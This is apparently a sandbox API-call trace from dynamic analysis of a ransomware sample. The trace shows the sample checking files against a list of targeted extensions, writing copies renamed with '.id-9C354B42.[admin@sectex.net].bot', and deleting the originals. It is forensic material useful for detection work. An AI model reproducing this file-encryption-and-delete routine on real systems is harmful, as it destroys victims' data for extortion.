	[0048.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69
	[0048.060] lstrlenW (lpString=".jpg") returned 4
	[0048.060] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.061] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.061] lstrlenW (lpString="VBCN6.CHM") returned 9
	[0048.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.061] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=109718) returned 1
	[0048.061] CloseHandle (hObject=0x214) returned 1
	[0048.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 0x20
	[0048.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.061] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.061] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.062] GetLastError () returned 0x0
	[0048.062] ReadFile (in: hFile=0x214, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x1ac96, lpOverlapped=0x0) returned 1
	[0048.065] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1aca0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1aca0, lpOverlapped=0x0) returned 1
	[0048.067] ReadFile (in: hFile=0x214, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.067] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0048.067] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.067] CloseHandle (hObject=0x1d0) returned 1
	[0048.067] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.067] SetEndOfFile (hFile=0x214) returned 1
	[0048.069] CloseHandle (hObject=0x214) returned 1
	[0048.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.069] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 1
	[0048.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.069] lstrlenW (lpString=".doc") returned 4
	[0048.069] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.069] lstrlenW (lpString=".docx") returned 5
	[0048.069] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.069] lstrlenW (lpString=".pdf") returned 4
	[0048.069] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.069] lstrlenW (lpString=".xls") returned 4
	[0048.069] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.069] lstrlenW (lpString=".xlsx") returned 5
	[0048.069] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.069] lstrlenW (lpString=".ppt") returned 4
	[0048.069] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.070] lstrlenW (lpString=".zip") returned 4
	[0048.070] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.070] lstrlenW (lpString=".rar") returned 4
	[0048.070] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.070] lstrlenW (lpString=".bz2") returned 4
	[0048.070] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.070] lstrlenW (lpString=".7z") returned 3
	[0048.070] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.070] lstrlenW (lpString=".dbf") returned 4
	[0048.070] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.070] lstrlenW (lpString=".1cd") returned 4
	[0048.070] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.137] lstrlenW (lpString=".jpg") returned 4
	[0048.137] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.137] lstrlenW (lpString=".doc") returned 4
	[0048.137] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.137] lstrlenW (lpString=".docx") returned 5
	[0048.137] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.137] lstrlenW (lpString=".pdf") returned 4
	[0048.137] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.137] lstrlenW (lpString=".xls") returned 4
	[0048.137] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.137] lstrlenW (lpString=".xlsx") returned 5
	[0048.138] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.138] lstrlenW (lpString=".ppt") returned 4
	[0048.138] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.138] lstrlenW (lpString=".zip") returned 4
	[0048.138] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.138] lstrlenW (lpString=".rar") returned 4
	[0048.138] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.138] lstrlenW (lpString=".bz2") returned 4
	[0048.138] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.138] lstrlenW (lpString=".7z") returned 3
	[0048.138] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.138] lstrlenW (lpString=".dbf") returned 4
	[0048.138] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.138] lstrlenW (lpString=".1cd") returned 4
	[0048.138] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70
	[0048.138] lstrlenW (lpString=".jpg") returned 4
	[0048.138] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.138] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.138] lstrlenW (lpString="VBLR6.CHM") returned 9
	[0048.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0048.980] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=944994) returned 1
	[0048.980] CloseHandle (hObject=0x190) returned 1
	[0048.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 0x20
	[0048.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.980] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0048.980] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.980] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.980] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0048.981] GetLastError () returned 0x0
	[0048.981] ReadFile (in: hFile=0x190, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xe6b62, lpOverlapped=0x0) returned 1
	[0049.668] WriteFile (in: hFile=0x218, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6b70, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6b70, lpOverlapped=0x0) returned 1
	[0049.683] ReadFile (in: hFile=0x190, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0049.683] WriteFile (in: hFile=0x218, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0049.683] SetEndOfFile (hFile=0x218) returned 1
	[0049.683] CloseHandle (hObject=0x218) returned 1
	[0049.683] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.683] SetEndOfFile (hFile=0x190) returned 1
	[0049.691] CloseHandle (hObject=0x190) returned 1
	[0049.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0049.691] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 1
	[0049.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.691] lstrlenW (lpString=".doc") returned 4
	[0049.691] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0049.691] lstrlenW (lpString=".docx") returned 5
	[0049.691] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0049.691] lstrlenW (lpString=".pdf") returned 4
	[0049.691] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0049.691] lstrlenW (lpString=".xls") returned 4
	[0049.691] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString=".xlsx") returned 5
	[0049.692] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0049.692] lstrlenW (lpString=".ppt") returned 4
	[0049.692] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.692] lstrlenW (lpString=".zip") returned 4
	[0049.692] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString=".rar") returned 4
	[0049.692] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString=".bz2") returned 4
	[0049.692] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0049.692] lstrlenW (lpString=".7z") returned 3
	[0049.692] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0049.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.692] lstrlenW (lpString=".dbf") returned 4
	[0049.692] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.692] lstrlenW (lpString=".1cd") returned 4
	[0049.692] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0049.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.692] lstrlenW (lpString=".jpg") returned 4
	[0049.692] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0049.692] lstrlenW (lpString=".doc") returned 4
	[0049.692] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0049.692] lstrlenW (lpString=".docx") returned 5
	[0050.117] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0050.118] lstrlenW (lpString=".pdf") returned 4
	[0050.118] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0050.118] lstrlenW (lpString=".xls") returned 4
	[0050.118] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0050.118] lstrlenW (lpString=".xlsx") returned 5
	[0050.118] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0050.118] lstrlenW (lpString=".ppt") returned 4
	[0050.118] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0050.118] lstrlenW (lpString=".zip") returned 4
	[0050.118] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0050.118] lstrlenW (lpString=".rar") returned 4
	[0050.118] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0050.118] lstrlenW (lpString=".bz2") returned 4
	[0050.118] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0050.118] lstrlenW (lpString=".7z") returned 3
	[0050.118] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0050.118] lstrlenW (lpString=".dbf") returned 4
	[0050.118] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0050.118] lstrlenW (lpString=".1cd") returned 4
	[0050.118] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70
	[0050.118] lstrlenW (lpString=".jpg") returned 4
	[0050.118] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0050.118] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0050.118] lstrlenW (lpString="16_9-frame-background.png") returned 25
	[0050.118] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0050.716] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=45199) returned 1
	[0050.716] CloseHandle (hObject=0x21c) returned 1
	[0050.716] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png")) returned 0x20
	[0050.716] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.716] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.717] lstrlenW (lpString=".doc") returned 4
	[0050.717] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.717] lstrlenW (lpString=".docx") returned 5
	[0050.717] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1
	[0050.717] lstrlenW (lpString=".pdf") returned 4
	[0050.717] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.717] lstrlenW (lpString=".xls") returned 4
	[0050.717] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.717] lstrlenW (lpString=".xlsx") returned 5
	[0050.717] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1
	[0050.717] lstrlenW (lpString=".ppt") returned 4
	[0050.717] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.717] lstrlenW (lpString=".zip") returned 4
	[0050.717] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.717] lstrlenW (lpString=".rar") returned 4
	[0050.717] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.717] lstrlenW (lpString=".bz2") returned 4
	[0050.717] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.717] lstrlenW (lpString=".7z") returned 3
	[0050.717] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.717] lstrlenW (lpString=".dbf") returned 4
	[0050.717] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.717] lstrlenW (lpString=".1cd") returned 4
	[0050.717] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.717] lstrlenW (lpString=".jpg") returned 4
	[0050.717] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0050.717] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.718] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.718] lstrlenW (lpString=".doc") returned 4
	[0050.718] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.718] lstrlenW (lpString=".docx") returned 5
	[0050.718] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1
	[0050.718] lstrlenW (lpString=".pdf") returned 4
	[0050.718] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.718] lstrlenW (lpString=".xls") returned 4
	[0050.718] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.718] lstrlenW (lpString=".xlsx") returned 5
	[0050.718] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1
	[0050.718] lstrlenW (lpString=".ppt") returned 4
	[0050.718] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.718] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.718] lstrlenW (lpString=".zip") returned 4
	[0050.718] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.718] lstrlenW (lpString=".rar") returned 4
	[0050.718] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.718] lstrlenW (lpString=".bz2") returned 4
	[0050.718] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.718] lstrlenW (lpString=".7z") returned 3
	[0050.718] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.718] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.718] lstrlenW (lpString=".dbf") returned 4
	[0050.718] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.718] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.718] lstrlenW (lpString=".1cd") returned 4
	[0050.718] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0050.718] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78
	[0050.718] lstrlenW (lpString=".jpg") returned 4
	[0050.718] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0050.718] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0050.719] lstrlenW (lpString="TravelIntroToMainMask_PAL.wmv") returned 29
	[0050.719] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0051.357] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=61220) returned 1
	[0051.357] CloseHandle (hObject=0x1d0) returned 1
	[0051.364] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv")) returned 0x20
	[0051.367] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.702] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0051.702] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.702] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.702] lstrlenW (lpString=".doc") returned 4
	[0051.702] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0051.702] lstrlenW (lpString=".docx") returned 5
